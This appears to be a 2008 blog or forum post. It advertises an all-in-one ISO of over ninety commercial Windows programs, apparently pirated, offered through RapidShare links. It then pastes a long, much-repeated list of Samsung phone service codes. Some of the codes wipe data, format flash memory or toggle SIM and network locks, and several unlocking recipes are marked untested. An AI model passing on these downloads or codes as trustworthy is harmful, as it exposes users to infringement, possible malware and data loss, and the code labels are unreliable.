Saturday, February 16, 2008
Huge Collection Of Ultimate Utilities [90+ Appz on 1 CD]
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
[size=18][u]Ultimate utilities[AIO] (Over 90 Programs in one CD)[/u][/size]
Type: ISO
Size on disc: 702 MB
[b]No Password, No Virus[/b]
Burn Tested. ENJOY!
[color=blue][b]Here's d SCREENSHOTS::[/b][/color]
[img]http://img2.freeimagehosting.net/uploads/950ab125a2.jpg[/img]
[img]http://img2.freeimagehosting.net/uploads/161a48612c.jpg[/img]
[img]http://img2.freeimagehosting.net/uploads/d46f6554a9.jpg[/img]
[img]http://img2.freeimagehosting.net/uploads/4a6ba2a734.jpg[/img]
[img]http://img2.freeimagehosting.net/uploads/8496f5429d.jpg[/img]
[img]http://img2.freeimagehosting.net/uploads/4c176bc78f.jpg[/img]
[img]http://img2.freeimagehosting.net/uploads/24765aa371.jpg[/img]
[img]http://img2.freeimagehosting.net/uploads/a42dbfb083.jpg[/img]
[img]http://img2.freeimagehosting.net/uploads/85130d582c.jpg[/img]
[img]http://img2.freeimagehosting.net/uploads/4a3342fa47.jpg[/img]
[color=green][b]Here's d complete LIST of proggies in here::[/b][/color] :P
[b]Page 1:[/b]
Acme Photo Screensaver Maker 1.90
Active @ UNDELETE V5.1
Advanced CD Ripper Pro 2.63
Advanced JPEG Compressor 5.0
Advanced X Video Converter 4.7.2
Alcohol 120% V1.9.6.5403
Almeza Multiset 4.5 (build 215)
AnyDVD 6.1.5.5
AoA DVD copie
AoA DVD Ripper
[b]Page 2:[/b]
Ashampoo burning studio 7.10
Ashampoo magical defrag 2
Ashampoo mp3 audio center 1.70
Ashampoo music studio 3.2.1
Audio Grabber
Auto Gordian Knot 2.45
AutoPlay Media Studio 6.0.5.0
Avant Browser 11.5 build 21
AveIconifier 2.0
Az Video Converter
[b]Page 3:[/b]
Belltech Business Card Designer Pro 4.0
Blaze media Pro 7
Camtasia studio 4
Clear SideBar (Vista Style)
CloneCD 5.3.0.1
CloneDVD 2.9.0.8
Cool mp3 splitter
Driver Max
DVD Audio extractor 4.2.1
DVD Idle Pro 5.9
[b]Page 4:[/b]
Easy Video Joiner 5.21
ElcomSoft advanced password recovery studio
foxit PDf reader Pro + Foxit PDF Editor
FullShot Enterprise 9.2
GOM Player
Google Earth pro 4.2.0
Hode Ip Platinum 3.43
I Color Folder + Ico folder skin pakage
Icon Grabber 1.04
Image to PDF v3.0
[b]Page 5:[/b]
Inno Setup 5.1.11
Internet Download Manager 5.11
Irfan View 4 + Plugins
IsoBuster Pro 2.1.0.2
kaspersky internet security 7.0.0.125
Magic Utilities 2007 5.01
Magic Video Converter 8.2.0
MagicISO 5.4 + magic Disc
MemoriesOnTV 3.1.8 pro Includet Clipshow Package Vol 1
Mp3 Splitter & Joiner 3.0
[b]Page 6:[/b]
Nero 8 Lite
nLite 1.4
Norton Internet security 2007
Online TV Player v3.0.910
Passware Kit 8
PDF generator 1.50
PDf image extraction wizard
PDF Password Remover 3
Photodex ProShow Gold 3.0.1991
PhotoZoom Pro 2.2.2
[b]page 7:[/b]
Picture reseize genuis
Power ISO 3.8
Primo PDF 3.1
QuickTime Pro 7.2
Privacy Guardian 4.1.0.37
RealPlayer 10.5 Gold
Recover My Files 3.98 (5178)
Registry Mechanic 7.0
Setup factory 7.0.6.1
Spyware Doctor 5.1.0.272
[b]Page 8:[/b]
STOIK RedEye AutoFix 3.0
Total video 2 dvd author 2.01
Total Video Converter 3.10
Tuneup utility 2007
UltraISO Premium Edition v8.6.1.1985
Unlocker1.8.5
Very PDF To word
VLC media Player
vLite-1.0.beta
VSO Convert X To DVD 2.1.18.242
[b]Page 9:[/b]
Widgets
Win utilities 5.2.3
winamp 5.5 pro
WinAVI Video Converter 8
WinCleaner OneClick CleanUp 10.2
Windows Essentials Codec Pack
WinRar 3.71 Final
Winzip 11.1 Pro
XP Repair Pro 2007 v3.5.3
Your Uninstaller! 2006 PRO- Vista Ready
==============================
[color=orange][b]DOWNLOAD:[/b][/color]
[code]http://rapidshare.com/files/92266769/ultmt__util__AIO__c.o.R.part1.rar
http://rapidshare.com/files/92273153/ultmt__util__AIO__c.o.R.part2.rar
http://rapidshare.com/files/92302720/ultmt__util__AIO__c.o.R.part3.rar
http://rapidshare.com/files/92321520/ultmt__util__AIO__c.o.R.part4.rar
http://rapidshare.com/files/92341157/ultmt__util__AIO__c.o.R.part5.rar
http://rapidshare.com/files/92358763/ultmt__util__AIO__c.o.R.part6.rar
http://rapidshare.com/files/92374759/ultmt__util__AIO__c.o.R.part7.rar[/code]
HERE'S THE COMPLETE LIST OF SAMSUNG SECRET CODES:
*#1111# S/W Version
*#1234# Firmware Version
*#2222# H/W Version
*#8999*8376263# All Versions Together
*#8999*8378# Test Menu
*#4777*8665# GPSR Tool
*#8999*523# LCD Brightness
*#8999*377# Error Menu
*#8999*327# EEP Menu
*#8999*3825523# Don't Know.
*#8999*667# Debug Mode
*#92782# PhoneModel (Wap)
#*5737425# JAVA Mode
*#2255# Call List
*#232337# Bluetooth MAC Adress
*#5282837# Java Version
#*4773# Incremental Redundancy
#*7752# 8 PSK uplink capability bit
#*7785# Reset wakeup & RTK timer cariables/variables
#*1200# ????
#*7200# Tone Generator Mute
#*3888# BLUETOOTH Test mode
#*#8999*324# ??
#*7828# Task screen
#*5111# ??
#*#8377466# S/W Version & H/W Version
#*2562# Restarts Phone
#*2565# No Blocking? General Defense.
#*3353# General Defense, Code Erased.
#*3837# Phone Hangs on White screen
#*3849# Restarts Phone
#*3851# Restarts Phone
#*3876# Restarts Phone
#*7222# Operation Typ: (Class C GSM)
#*7224# !!! ERROR !!!
#*7252# Operation Typ: (Class B GPRS)
#*7271# CMD: (Not Available)
#*7274# CMD: (Not Available)
#*7337# Restarts Phone (Resets Wap Settings)
#*2787# CRTP ON/OFF
#*2886# AutoAnswer ON/OFF
#*3737# L1 AFC
#*5133# L1 HO Data
#*7288# GPRS Detached/Attached
#*7287# GPRS Attached
#*7666# White Screen
#*7693# Sleep Deactivate/Activate
#*7284# L1 HO Data
#*2256# Calibration info? (For CMD set DEBUGAUTONOMY in cihard.opt)
#*2286# Databattery
#*2527# GPRS switching set to (Class 4, 8, 9, 10)
#*2679# Copycat feature Activa/Deactivate
#*3940# External looptest 9600 bps
#*4263# Handsfree mode Activate/Deactivate
#*4700# Please use function 2637
#*7352# BVMC Reg value (LOW_SWTOFF, NOMINAL_SWTOFF)
#*2558# Time ON
#*3370# Same as 4700
#*3941# External looptest 115200 bps
#*5176# L1 Sleep
#*7462# SIM Phase
#*7983# Voltage/Freq
#*7986# Voltage
#*8466# Old Time
#*2255# Call Failed
#*5187# L1C2G trace Activate/Deactivate
#*5376# DELETE ALL SMS!!!!
#*6837# Official Software Version: (0003000016000702)
#*7524# KCGPRS: (FF FF FF FF FF FF FF FF 07)
#*7562# LOCI GPRS: (FF FF FF FF FF FF FF FF FF FF FF FE FF 01)
#*2337# Permanent Registration Beep
#*2474# Charging Duration
#*2834# Audio Path (Handsfree)
#*3270# DCS Support Activate/Deactivate
#*3282# Data Activate/Deactivate
#*3476# EGSM Activate/Deactivate
#*3676# FORMAT FLASH VOLUME!!!
#*4760# GSM Activate/Deactivate
#*4864# White Screen
#*5171# L1P1
#*5172# L1P2
#*5173# L1P3
#*7326# Accessory
#*7683# Sleep variable
#*8465# Time in L1
#*2252# Current CAL
#*2836# AVDDSS Management Activate/Deactivate
#*3877# Dump of SPY trace
#*7728# RSAV
#*2677# Same as 4700
#*3797# Blinks 3D030300 in RED
#*3728# Time 2 Decod
#*3725# B4 last off
#*7372# Resetting the time to DPB variables
#*7732# Packet flow context bit Activate/Deactivate
#*6833# New uplink establishment Activate/Deactivate
#*3273# EGPRS multislot (Class 4, 8, 9, 10)
#*7722# RLC bitmap compression Activate/Deactivate
#*2351# Blinks 1347E201 in RED
#*4472# Hysteresis of serving cell: 3 dB
#*2775# Switch to 2 inner speaker
#*9270# Force WBS
#*7878# FirstStartup (0=NO, 1=YES)
#*3757# DSL UART speed set to (LOW, HIGH)
#*8726# Switches USBACM to Normal
#*8724# Switches USBACM to Generator mode
#*8727# Switches USBACM to Slink mode
#*8725# Switches USBACM to Loop-back mode
#*3838# Blinks 3D030300 in RED
#*2077# GPRS Switch
#*2027# GPRS Switch
#*0227# GPRS Switch
#*0277# GPRS Switch
#*22671# AMR REC START
#*22672# Stop AMR REC (File name: /a/multimedia/sounds/voice list/ENGMODE.amr)
#*22673# Pause REC
#*22674# Resume REC
#*22675# AMR Playback
#*22676# AMR Stop Play
#*22677# Pause Play
#*22678# Resume Play
#*77261# PCM Rec Req
#*77262# Stop PCM Rec
#*77263# PCM Playback
#*77264# PCM Stop Play
#*2872# CNT
*#8999*283# ???
#*22679# AMR Get Time
*288666# ???
*2886633# ???
*#8999*364# Watchdog ON/OFF
#*8370# Tfs4.0 Test 0
#*8371# Tfs4.0 Test 1
#*8372# Tfs4.0 Test 2
#*8373# Tfs4.0 Test 3
#*8374# Tfs4.0 Test 4
#*8375# Tfs4.0 Test 5
#*8376# Tfs4.0 Test 6
#*8377# Tfs4.0 Test 7
#*8378# Tfs4.0 Test 8
#*8379# Tfs4.0 Test 9
#837837# error=...
#*36245# Turns Email TestMenu on.
*2767*22236245# Email EPP set (....)!
*2767*837836245# Email Test Account!
*2767*29536245# Email Test2 Account!
*2767*036245# Email EPP reset!
*2767*136245# Email EPP set (1)!
*2767*736245# Email EPP set (7)!
*2767*3036245# Email...
*2767*3136245# Email...
*2767*3336245# Email...
*2767*3436245# Email...
*2767*3936245# Email...
*2767*4136245# Email...
*2767*4336245# Email...
*2767*4436245# Email...
*2767*4536245# Email...
*2767*4636245# Email...
*2767*4936245# Email...
*2767*6036245# Email...
*2767*6136245# Email...
*2767*6236245# Email...
*2767*6336245# Email...
*2767*6536245# Email...
*2767*6636245# Email...
*2767*8636245# Email...
*2767*85236245# Email...
*2767*3855# = E2P Full Reset
*2767*2878# = E2P Custom Reset
*2767*927# = E2P Wap Reset
*2767*226372# = E2P Camera Reset
*2767*688# Reset Mobile TV
#7263867# = RAM Dump (On or Off)
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings
*#7465625# = Check the locks
*7465625*638*Code# = Enables Network lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*27*Code# = Disables CP lock
*7465625*746*Code# = Enables SIM lock
#7465625*746*Code# = Disables SIM lock
*7465625*228# = Activa lock ON
#7465625*228# = Activa lock OFF
*7465625*28638# = Auto Network lock ON
#7465625*28638# = Auto Network lock OFF
*7465625*28782# = Auto subset lock ON
#7465625*28782# = Auto subset lock OFF
*7465625*2877# = Auto SP lock ON
#7465625*2877# = Auto SP lock OFF
*7465625*2827# = Auto CP lock ON
#7465625*2827# = Auto CP lock OFF
*7465625*28746# = Auto SIM lock ON
#7465625*28746# = Auto SIM lock OFF
**********************
#*7878# FirstStartup (0=NO, 1=YES)
#*3838# Blinks 3D030300 in RED
#*2077# GPRS Switch
#*2027# GPRS Switch
#*0227# GPRS Switch
#*0277# GPRS Switch
#*22671# AMR REC START
#*22672# Stop AMR REC (File name: /a/multimedia/sounds/voice list/ENGMODE.amr)
#*22673# Pause REC
#*22674# Resume REC
#*22675# AMR Playback
#*22676# AMR Stop Play
#*22677# Pause Play
#*22678# Resume Play
#*77261# PCM Rec Req
#*77262# Stop PCM Rec
#*77263# PCM Playback
#*77264# PCM Stop Play
#*22679# AMR Get Time
*#8999*364# Watchdog ON/OFF
*#8999*427# WATCHDOG signal route setup
*2767*3855# = Full Reset (Caution every stored data will be deleted.)
*2767*2878# = Custom Reset
*2767*927# = Wap Reset
*2767*226372# = Camera Reset (deletes photos)
*2767*688# Reset Mobile TV
#7263867# = RAM Dump (On or Off)
Samsung Secret Codes Part 3
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings
*#7465625# = Check the phone lock status
*7465625*638*Code# = Enables Network lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*27*Code# = Disables CP lock
*7465625*746*Code# = Enables SIM lock
#7465625*746*Code# = Disables SIM lock
*7465625*228# = Activa lock ON
#7465625*228# = Activa lock OFF
*7465625*28638# = Auto Network lock ON
#7465625*28638# = Auto Network lock OFF
*7465625*28782# = Auto subset lock ON
#7465625*28782# = Auto subset lock OFF
*7465625*2877# = Auto SP lock ON
#7465625*2877# = Auto SP lock OFF
*7465625*2827# = Auto CP lock ON
#7465625*2827# = Auto CP lock OFF
*7465625*28746# = Auto SIM lock ON
#7465625*28746# = Auto SIM lock OFF
Type *#9998*627837793# Go to the 'my parameters' and there you will find new menu where you can unlock phone.(not tested-for samsung C100)
To unlock a Samsung turn the phone off take the sim card and type the following code *#pw+15853649247w# .
Java status code: #*53696# (Samsung X600)
If you want to unlock your phone put a sim from another company then type *#9998*3323# it will reset your phone. Push exit and then push 7, it will reset again. Put your other sim in and it will say sim lock, type in 00000000 then it should be unlocked. Type in *0141# then the green call batton and it's unlocked to all networks. This code may not work on the older phones and some of the newer phones. If it doesn't work you will have to reset your phone without a sim in it by typing *#2767*2878# or *#9998*3855# (not tested)
*2767*688# = Unlocking Code
*#8999*8378# = All in one Code
*#4777*8665# = GPSR Tool
*#8999*523# = LCD Brightness
*#8999*3825523# = External Display
*#8999*377# = Errors
#*5737425# = JAVA Something{I choose 2 and it chrashed}][/b]
*#2255# = Call List
#*536961# = Java Status Code
#*536962# = Java Status Code
#*536963# = Java Status Code
#*53696# = Java Status Code
#*1200# = AFC DAC Val
#*1300# = IMEI
#*1400# = IMSI
#*2562# = ??? White for 15 secs than restarts.
#*2565# = Check Blocking
#*3353# = Check Code
#*3837# = ??? White for 15 secs than restarts.
#*3849# = ??? White for 15 secs than restarts.
#*3851# = ??? White for 15 secs than restarts.
#*3876# = ??? White for 15 secs than restarts.
#*7222# = Operation Typ (Class C GSM)
#*7224# = I Got !! ERROR !!
#*7252# = Oparation Typ (Class B GPRS)
#*7271# = Multi Slot (Class 1 GPRS)
#*7274# = Multi Slot (Class 4 GPRS)
#*7276# = Dunno
#*7337# = EEPROM Reset (Unlock and Resets WAP Settings)
#*2787# = CRTP ON/OFF
#*3737# = L1 Dbg data
#*5133# = L1 Dbg data
#*7288# = GPRS Attached
#*7287# = GPRS Detached
#*7666# = SrCell Data
#*7693# = Sleep Act/DeAct (Enable or Disable the Black screen after doing nothing for a while)
#*7284# = Class : B,C or GPRS
#*2256# = Calibration Info
#*2286# = Battery Data
#*2527# = GPRS Switching (set to: class 4, class 8, class 9 or class 10)
#*2679# = Copycat feature (Activate or Deactivate)
#*3940# = External loop test 9600 bps
#*4263# = Handsfree mode (Activate or Deactivate)
#*4700# = Half Rate (Activate or Deactivate)
#*7352# = BVMC Reg value
#*8462# = Sleeptime
#*2558# = Time ON
#*3370# = EFR (Activate or Deactivate)
#*3941# = External looptest 115200 bps
#*5176# = L1 Sleep
#*7462# = SIM phase
#*7983# = Voltage/Frequenci (Activate or Deactivate)
#*7986# = Voltage (Activate or Deactivate)
#*8466# = Old time
#*2255# = Call ???
#*5187# = L1C2G trace (Activate or Deactivate)
#*5376# = ??? White for 15 secs than restarts.
#*6837# = Official Software Version
#*7524# = KCGPRS
#*7562# = LOCI GPRS
#*7638# = RLC allways open ended TBF (Activate or Deactivate)
#*7632# = Sleep mode Debug
#*7673# = Sleep mode RESET
#*2337# = Permanent Registration Beep
#*2474# = ???
#*2834# = Audio Path
#*3270# = DCS support (Activate or Deactivate)
#*3282# = Data (Activate or Deactivate)
#*3476# = EGSM (Activate or Deactivate)
#*3676# = Flash volume formated
#*4760# = GSM (Activate or Deactivate)
#*4864# = Dunno doesn't work on newer versions
#*5171# = L1P1
#*5172# = L1P2
#*5173# = L1P3
#*7326# = Accessory (I got Vibrator)
#*7683# = Sleep variable (
#*7762# = SMS Brearer CS (Activate or Deactivate)
#*8465# = Time in L1
#*9795# = wtls key
#*2252# = Current CAL
#*2836# = AVDDSS Management (Activate or Deactivate)
#*3877# = Dump of SPY trace
#*7728# = RSAV done# (Everything went to standart but nothing was deleted)
#*2677# = ARM State (None or Full Rate)
*#8999*636# = Have no clue what it is, i see 20 lines
*#9999# = Software version
*#8999*8376263# = HW ver, SW ver and Build Date
*#8888# = HW version
*#8377466# = Same HW/SW version thing
*#7465625# = Check the locks
*7465625*638*Code# = Enables Network lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*27*Code# = Disables CP lock
*7465625*746*Code# = Enables SIM lock
#7465625*746*Code# = Disables SIM lock
*7465625*228# = Activa lock ON
#7465625*228# = Activa lock OFF
*7465625*28638# = Auto Network lock ON
#7465625*28638# = Auto Network lock OFF
*7465625*28782# = Auto subset lock ON
#7465625*28782# = Auto subset lock OFF
*7465625*2877# = Auto SP lock ON
#7465625*2877# = Auto SP lock OFF
*7465625*2827# = Auto CP lock ON
#7465625*2827# = Auto CP lock OFF
*7465625*28746# = Auto SIM lock ON
#7465625*28746# = Auto SIM lock OFF
*2767*3855# = E2P Full Reset
*2767*2878# = E2P Custom Reset
*2767*927# = E2P WAP Reset
*2767*226372# = E2P Camera Reset
#*6420# = MIC Off
#*6421# = MIC On
#*6422# = MIC Data
#*6428# = MIC Measurement
#*3230# = Trace enable and DCD disable
#*3231# = Trace disable and DCD enable
#*3232# = Current Mode
#7263867# = RAM Dump (On or Off)
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings
*335# = Delete all MMS Messages
*663867# = Dump Mm file
#*536961# = WAPSAR enable / HTTP disable
#*536962# = WAPSAR disable / HTTP enable
#*536963# = Serial eable / Others disable
#*53696# = Java Download Mode
#*5663351# = WAP Model ID [Your Model]
#*5663352# = WAP Model ID [SEC-SGHXXXX/1.0]
#*566335# = WAP Model ID [SEC-SGHXXXX/1.0]
*2767*66335# = Check on which model it is
*2767*7100# = SEC-SGHS100/1.0
*2767*8200# = SEC-SGHV200/1.0
*2767*7300# = SEC-SGHS300/1.0
*2767*7650# = Nokia7650/1.0
*2767*2877368# = Reset WAP Model ID to standart
--------------------
*#1234# Firmware Version
*#2222# H/W Version
*#8999*8376263# All Versions Together
*#8999*8378# Test Menu
*#4777*8665# GPSR Tool
*#8999*523# LCD Brightness
*#8999*377# Error Menu
*#8999*327# EEP Menu
*#8999*3825523# Don't Know.
*#8999*667# Debug Mode
*#92782# PhoneModel (Wap)
#*5737425# JAVA Mode
*#2255# Call List
*#232337# Bluetooth MAC Adress
*#5282837# Java Version
#*4773# Incremental Redundancy
#*7752# 8 PSK uplink capability bit
#*7785# Reset wakeup & RTK timer cariables/variables
#*1200# ????
#*7200# Tone Generator Mute
#*3888# BLUETOOTH Test mode
#*#8999*324# ??
#*7828# Task screen
#*5111# ??
#*#8377466# S/W Version & H/W Version
#*2562# Restarts Phone
#*2565# No Blocking? General Defense.
#*3353# General Defense, Code Erased.
#*3837# Phone Hangs on White screen
#*3849# Restarts Phone
#*3851# Restarts Phone
#*3876# Restarts Phone
#*7222# Operation Typ: (Class C GSM)
#*7224# !!! ERROR !!!
#*7252# Operation Typ: (Class B GPRS)
#*7271# CMD: (Not Available)
#*7274# CMD: (Not Available)
#*7337# Restarts Phone (Resets Wap Settings)
#*2787# CRTP ON/OFF
#*2886# AutoAnswer ON/OFF
#*3737# L1 AFC
#*5133# L1 HO Data
#*7288# GPRS Detached/Attached
#*7287# GPRS Attached
#*7666# White Screen
#*7693# Sleep Deactivate/Activate
#*7284# L1 HO Data
#*2256# Calibration info? (For CMD set DEBUGAUTONOMY in cihard.opt)
#*2286# Databattery
#*2527# GPRS switching set to (Class 4, 8, 9, 10)
#*2679# Copycat feature Activa/Deactivate
#*3940# External looptest 9600 bps
#*4263# Handsfree mode Activate/Deactivate
#*4700# Please use function 2637
#*7352# BVMC Reg value (LOW_SWTOFF, NOMINAL_SWTOFF)
#*2558# Time ON
#*3370# Same as 4700
#*3941# External looptest 115200 bps
#*5176# L1 Sleep
#*7462# SIM Phase
#*7983# Voltage/Freq
#*7986# Voltage
#*8466# Old Time
#*2255# Call Failed
#*5187# L1C2G trace Activate/Deactivate
#*5376# DELETE ALL SMS!!!!
#*6837# Official Software Version: (0003000016000702)
#*7524# KCGPRS: (FF FF FF FF FF FF FF FF 07)
#*7562# LOCI GPRS: (FF FF FF FF FF FF FF FF FF FF FF FE FF 01)
#*2337# Permanent Registration Beep
#*2474# Charging Duration
#*2834# Audio Path (Handsfree)
#*3270# DCS Support Activate/Deactivate
#*3282# Data Activate/Deactivate
#*3476# EGSM Activate/Deactivate
#*3676# FORMAT FLASH VOLUME!!!
#*4760# GSM Activate/Deactivate
#*4864# White Screen
#*5171# L1P1
#*5172# L1P2
#*5173# L1P3
#*7326# Accessory
#*7683# Sleep variable
#*8465# Time in L1
#*2252# Current CAL
#*2836# AVDDSS Management Activate/Deactivate
#*3877# Dump of SPY trace
#*7728# RSAV
#*2677# Same as 4700
#*3797# Blinks 3D030300 in RED
#*3728# Time 2 Decod
#*3725# B4 last off
#*7372# Resetting the time to DPB variables
#*7732# Packet flow context bit Activate/Deactivate
#*6833# New uplink establishment Activate/Deactivate
#*3273# EGPRS multislot (Class 4, 8, 9, 10)
#*7722# RLC bitmap compression Activate/Deactivate
#*2351# Blinks 1347E201 in RED
#*4472# Hysteresis of serving cell: 3 dB
#*2775# Switch to 2 inner speaker
#*9270# Force WBS
#*7878# FirstStartup (0=NO, 1=YES)
#*3757# DSL UART speed set to (LOW, HIGH)
#*8726# Switches USBACM to Normal
#*8724# Switches USBACM to Generator mode
#*8727# Switches USBACM to Slink mode
#*8725# Switches USBACM to Loop-back mode
#*3838# Blinks 3D030300 in RED
#*2077# GPRS Switch
#*2027# GPRS Switch
#*0227# GPRS Switch
#*0277# GPRS Switch
#*22671# AMR REC START
#*22672# Stop AMR REC (File name: /a/multimedia/sounds/voice list/ENGMODE.amr)
#*22673# Pause REC
#*22674# Resume REC
#*22675# AMR Playback
#*22676# AMR Stop Play
#*22677# Pause Play
#*22678# Resume Play
#*77261# PCM Rec Req
#*77262# Stop PCM Rec
#*77263# PCM Playback
#*77264# PCM Stop Play
#*2872# CNT
*#8999*283# ???
#*22679# AMR Get Time
*288666# ???
*2886633# ???
*#8999*364# Watchdog ON/OFF
#*8370# Tfs4.0 Test 0
#*8371# Tfs4.0 Test 1
#*8372# Tfs4.0 Test 2
#*8373# Tfs4.0 Test 3
#*8374# Tfs4.0 Test 4
#*8375# Tfs4.0 Test 5
#*8376# Tfs4.0 Test 6
#*8377# Tfs4.0 Test 7
#*8378# Tfs4.0 Test 8
#*8379# Tfs4.0 Test 9
#837837# error=...
#*36245# Turns Email TestMenu on.
*2767*22236245# Email EPP set (....)!
*2767*837836245# Email Test Account!
*2767*29536245# Email Test2 Account!
*2767*036245# Email EPP reset!
*2767*136245# Email EPP set (1)!
*2767*736245# Email EPP set (7)!
*2767*3036245# Email...
*2767*3136245# Email...
*2767*3336245# Email...
*2767*3436245# Email...
*2767*3936245# Email...
*2767*4136245# Email...
*2767*4336245# Email...
*2767*4436245# Email...
*2767*4536245# Email...
*2767*4636245# Email...
*2767*4936245# Email...
*2767*6036245# Email...
*2767*6136245# Email...
*2767*6236245# Email...
*2767*6336245# Email...
*2767*6536245# Email...
*2767*6636245# Email...
*2767*8636245# Email...
*2767*85236245# Email...
*2767*3855# = E2P Full Reset
*2767*2878# = E2P Custom Reset
*2767*927# = E2P Wap Reset
*2767*226372# = E2P Camera Reset
*2767*688# Reset Mobile TV
#7263867# = RAM Dump (On or Off)
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings
*#7465625# = Check the locks
*7465625*638*Code# = Enables Network lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*27*Code# = Disables CP lock
*7465625*746*Code# = Enables SIM lock
#7465625*746*Code# = Disables SIM lock
*7465625*228# = Activa lock ON
#7465625*228# = Activa lock OFF
*7465625*28638# = Auto Network lock ON
#7465625*28638# = Auto Network lock OFF
*7465625*28782# = Auto subset lock ON
#7465625*28782# = Auto subset lock OFF
*7465625*2877# = Auto SP lock ON
#7465625*2877# = Auto SP lock OFF
*7465625*2827# = Auto CP lock ON
#7465625*2827# = Auto CP lock OFF
*7465625*28746# = Auto SIM lock ON
#7465625*28746# = Auto SIM lock OFF
**********************
#*7878# FirstStartup (0=NO, 1=YES)
#*3838# Blinks 3D030300 in RED
#*2077# GPRS Switch
#*2027# GPRS Switch
#*0227# GPRS Switch
#*0277# GPRS Switch
#*22671# AMR REC START
#*22672# Stop AMR REC (File name: /a/multimedia/sounds/voice list/ENGMODE.amr)
#*22673# Pause REC
#*22674# Resume REC
#*22675# AMR Playback
#*22676# AMR Stop Play
#*22677# Pause Play
#*22678# Resume Play
#*77261# PCM Rec Req
#*77262# Stop PCM Rec
#*77263# PCM Playback
#*77264# PCM Stop Play
#*22679# AMR Get Time
*#8999*364# Watchdog ON/OFF
*#8999*427# WATCHDOG signal route setup
*2767*3855# = Full Reset (Caution every stored data will be deleted.)
*2767*2878# = Custom Reset
*2767*927# = Wap Reset
*2767*226372# = Camera Reset (deletes photos)
*2767*688# Reset Mobile TV
#7263867# = RAM Dump (On or Off)
